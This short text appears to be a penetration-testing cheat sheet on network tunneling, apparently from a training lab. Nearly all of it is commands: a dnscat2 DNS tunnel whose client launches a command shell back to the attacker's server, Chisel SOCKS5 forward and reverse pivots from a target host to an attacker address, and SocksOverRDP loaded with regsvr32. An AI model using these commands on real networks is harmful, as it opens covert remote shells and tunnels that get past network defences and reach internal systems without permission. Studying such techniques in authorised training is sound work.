Advanced Tunneling Methods

DNS Tunneling

# Start dnscat2 Server
sudo ruby dnscat2.rb --dns host=<tun0>,port=53,domain=inlanefreight.local --no-cache

# Import Module
Import-Module .\dnscat2.ps1

# Gain Connection
Start-Dnscat2 -DNSserver <tun0> -Domain <domain> -PreSharedSecret <secret> -Exec cmd

# Interact With Session
window -i <id>

SOCKS5 With Chisel

# Server Side
./chisel server -v -p 1234 --socks5

# Target
./chisel client -v 10.129.202.64:1234 socks

# Now we can use proxychains (ProxyList entry in the proxychains config)
socks5 127.0.0.1 1080

Chisel Reverse Pivot

# Server Side
sudo ./chisel server --reverse -v -p 1234 --socks5

# Target Side
./chisel client -v 10.10.14.17:1234 R:socks

# Proxychains (ProxyList entry in the proxychains config)
socks5 127.0.0.1 1080

RDP & SOCKS Tunneling with SocksOverRDP

# Load DLL
regsvr32.exe SocksOverRDP-Plugin.dll

# Proxifier
127.0.0.1:1080 over SOCKS5
